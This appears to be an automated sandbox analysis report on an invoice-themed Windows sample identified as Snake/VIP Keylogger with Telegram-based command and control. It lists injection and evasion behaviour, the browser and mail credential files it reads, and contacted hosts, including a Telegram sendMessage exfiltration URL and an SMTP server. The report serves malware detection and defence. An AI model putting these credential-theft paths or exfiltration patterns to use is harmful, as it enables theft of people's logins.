Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597249s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597020s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596452s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595905s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595682s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595209s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594927s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597249 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597020 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596671 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596452 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595682 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595209 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594927 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594468 Jump to behavior
Source: Factura 1-2501377.exe, 00000004.00000002.3338879017.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllem(
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09668 LdrInitializeThunk, 4_2_05A09668
Enables debug privileges
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory written: C:\Users\user\Desktop\Factura 1-2501377.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Users\user\Desktop\Factura 1-2501377.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Users\user\Desktop\Factura 1-2501377.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1651217 Sample: Factura 1-2501377.exe Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 21 reallyfreegeoip.org 2->21 23 api.telegram.org 2->23 25 3 other IPs or domains 2->25 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Malicious sample detected (through community Yara rule) 2->37 43 8 other signatures 2->43 7 Factura 1-2501377.exe 3 2->7         started        signatures3 39 Tries to detect the country of the analysis system (by using the IP) 21->39 41 Uses the Telegram API (likely for C&C communication) 23->41 process4 file5 19 C:\Users\user\...\Factura 1-2501377.exe.log, ASCII 7->19 dropped 45 Injects a PE file into a foreign processes 7->45 11 Factura 1-2501377.exe 15 2 7->11         started        15 Factura 1-2501377.exe 7->15         started        17 Factura 1-2501377.exe 7->17         started        signatures6 process7 dnsIp8 27 webmail.mupa.com.tr 94.199.205.104, 49715, 587 AEROTEK-ASTR Turkey 11->27 29 checkip.dyndns.com 132.226.8.169, 49692, 49695, 49697 UTMEMUS United States 11->29 31 2 other IPs or domains 11->31 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal browser information (history, passwords, etc) 11->49 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
94.199.205.104
 webmail.mupa.com.tr Turkey
42807 AEROTEK-ASTR true
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.21.32.1
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 104.21.32.1 true
api.telegram.org 149.154.167.220 true
webmail.mupa.com.tr 94.199.205.104 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2028/03/2025%20/%2021:04:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://reallyfreegeoip.org/xml/45.92.229.138 false
        		high